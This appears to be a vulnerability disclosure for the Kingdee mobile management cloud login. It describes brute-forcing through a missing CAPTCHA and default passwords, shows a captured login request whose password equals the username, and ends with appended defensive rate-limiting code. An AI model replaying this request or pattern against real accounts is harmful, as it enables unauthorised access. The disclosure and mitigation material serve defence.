### Brief description:

As the title says: the Kingdee Enterprise Mobile Management Cloud is exposed to brute-force login attacks and weak passwords, because the login has no CAPTCHA and accounts keep default passwords.

### Details:

Affected URL: http://mcloud.kingdee.com/mcloud/pages/

![2.JPG](https://images.seebug.org/upload/201505/04171113e7cb8b1352bfddfe59f57537412a006f.jpg)

```
POST /mcloud/dwr/call/plaincall/custLoginService.login.dwr HTTP/1.1
Host: mcloud.kingdee.com
Proxy-Connection: keep-alive
Content-Length: 301
Origin: http://mcloud.kingdee.com
User-Agent:
Content-Type: text/plain
Accept: */*
Referer: http://mcloud.kingdee.com/mcloud/pages/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=w5u6heawhjdu1dt5et16a26sk

callCount=1
page=/mcloud/pages/
httpSessionId=w5u6heawhjdu1dt5et16a26sk
scriptSessionId=7EE1BE8590F1DDD3DC769322161A837A576
c0-scriptName=custLoginService
c0-methodName=login
c0-id=0
c0-e1=string:340727
c0-e2=string:340727
c0-param0=Object_Object:{user:reference:c0-e1, pwd:reference:c0-e2}
batchId=0
```

In a Burp test, trying only 300 accounts was enough to crack 9 accounts with weak passwords, as shown in the screenshot:

![1.JPG](https://images.seebug.org/upload/201505/0417090176c5bd06bcdc9ccfceeb69631388ae00.jpg)

### Proof of vulnerability:

![捕获.JPG](https://images.seebug.org/upload/201505/041710383236b2fa73c9b8abebe36a3bc68bcf68.jpg)
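
An added example, not part of the original report and not Kingdee's code: a server-side guard for the two gaps described above, unlimited login attempts and a password identical to the account name (in the captured request, `user` and `pwd` carry the same value). `LoginGuard`, `is_default_password`, `simulate`, the thresholds and the account names are hypothetical.

```python
import time

class LoginGuard:
    """Sliding-window failure limiter, keyed by source IP and by account."""

    def __init__(self, max_per_ip=20, max_per_account=5, window=300.0,
                 clock=time.monotonic):
        self.max_per_ip, self.max_per_account = max_per_ip, max_per_account
        self.window, self.clock = window, clock
        self._by_ip, self._by_account = {}, {}

    def _recent(self, table, key):
        # Count failures still inside the window; drop expired ones.
        cutoff = self.clock() - self.window
        kept = [t for t in table.get(key, ()) if t > cutoff]
        if kept:
            table[key] = kept
        else:
            table.pop(key, None)  # no state kept for idle keys
        return len(kept)

    def allowed(self, ip, account):
        """True if this source may try this account now."""
        return (self._recent(self._by_ip, ip) < self.max_per_ip and
                self._recent(self._by_account, account) < self.max_per_account)

    def record_failure(self, ip, account):
        now = self.clock()
        self._by_ip.setdefault(ip, []).append(now)
        self._by_account.setdefault(account, []).append(now)

def is_default_password(user, pwd):
    """Flag the pattern in the captured request: pwd equal to user."""
    return pwd.strip().lower() == user.strip().lower()

def simulate(guard, ip, accounts, check):
    """Replay one attempt per account from one source.
    Returns (attempts evaluated, attempts refused before evaluation)."""
    evaluated = refused = 0
    for account in accounts:
        if not guard.allowed(ip, account):
            refused += 1
            continue
        evaluated += 1
        if not check(account):
            guard.record_failure(ip, account)
    return evaluated, refused

# Constructed input: 300 account names tried from one documentation-range IP.
SAMPLE_ACCOUNTS = ["user%03d" % i for i in range(300)]
```

Call `is_default_password` at account creation and password change, and force a reset on login when it matches, so existing default credentials are retired as well as rate limited.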